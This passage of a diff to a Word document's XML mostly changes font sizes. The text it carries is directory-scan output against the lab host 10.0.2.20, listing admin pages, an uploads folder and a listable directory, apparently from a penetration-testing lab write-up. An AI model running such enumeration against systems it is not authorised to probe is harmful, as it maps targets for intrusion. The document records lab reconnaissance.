         <w:t xml:space="preserve">+ http://10.0.2.20/cgi-bin/ (CODE:403|SIZE:285)                                                                 </w:t>
@@ -666,18 +721,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">==&gt; DIRECTORY: http://10.0.2.20/classes/                                                                        </w:t>
@@ -685,18 +741,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">==&gt; DIRECTORY: http://10.0.2.20/css/                                                                            </w:t>
@@ -704,18 +761,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">+ http://10.0.2.20/favicon.ico (CODE:200|SIZE:14634)                                                            </w:t>
@@ -723,18 +781,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">+ http://10.0.2.20/footer (CODE:200|SIZE:185)                                                                   </w:t>
@@ -742,18 +801,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">+ http://10.0.2.20/header (CODE:200|SIZE:571)                                                                   </w:t>
@@ -761,18 +821,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">==&gt; DIRECTORY: http://10.0.2.20/images/                                                                         </w:t>
@@ -780,18 +841,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">+ http://10.0.2.20/index (CODE:200|SIZE:1311)                                                                   </w:t>
@@ -799,18 +861,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">+ http://10.0.2.20/index.php (CODE:200|SIZE:1311)                                                               </w:t>
@@ -818,18 +881,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">+ http://10.0.2.20/post (CODE:200|SIZE:786)                                                                     </w:t>
@@ -837,18 +901,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">+ http://10.0.2.20/server-status (CODE:403|SIZE:290)                                                            </w:t>
@@ -856,18 +921,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">                                                                                                                </w:t>
@@ -875,18 +941,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>---- Entering directory: http://10.0.2.20/admin/ ----</w:t>
@@ -894,18 +961,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">+ http://10.0.2.20/admin/del (CODE:302|SIZE:0)                                                                  </w:t>
@@ -913,18 +981,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">+ http://10.0.2.20/admin/edit (CODE:302|SIZE:0)                                                                 </w:t>
@@ -932,18 +1001,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">+ http://10.0.2.20/admin/footer (CODE:200|SIZE:19)                                                              </w:t>
@@ -951,18 +1021,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">+ http://10.0.2.20/admin/header (CODE:200|SIZE:653)                                                             </w:t>
@@ -970,18 +1041,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">+ http://10.0.2.20/admin/index (CODE:302|SIZE:0)                                                                </w:t>
@@ -989,18 +1061,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">+ http://10.0.2.20/admin/index.php (CODE:302|SIZE:0)                                                            </w:t>
@@ -1008,18 +1081,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">+ http://10.0.2.20/admin/login (CODE:200|SIZE:1387)                                                             </w:t>
@@ -1027,18 +1101,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">+ http://10.0.2.20/admin/logout (CODE:302|SIZE:0)                                                               </w:t>
@@ -1046,18 +1121,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">+ http://10.0.2.20/admin/new (CODE:302|SIZE:0)                                                                  </w:t>
@@ -1065,18 +1141,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">==&gt; DIRECTORY: http://10.0.2.20/admin/uploads/                                                                  </w:t>
@@ -1084,18 +1161,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">                                                                                                                </w:t>
@@ -1103,18 +1181,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>---- Entering directory: http://10.0.2.20/classes/ ----</w:t>
@@ -1122,266 +1201,280 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(!) WARNING: Directory IS LISTABLE. No need to scan it.                        </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    (Use mode '-w' if you want to scan it anyway)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
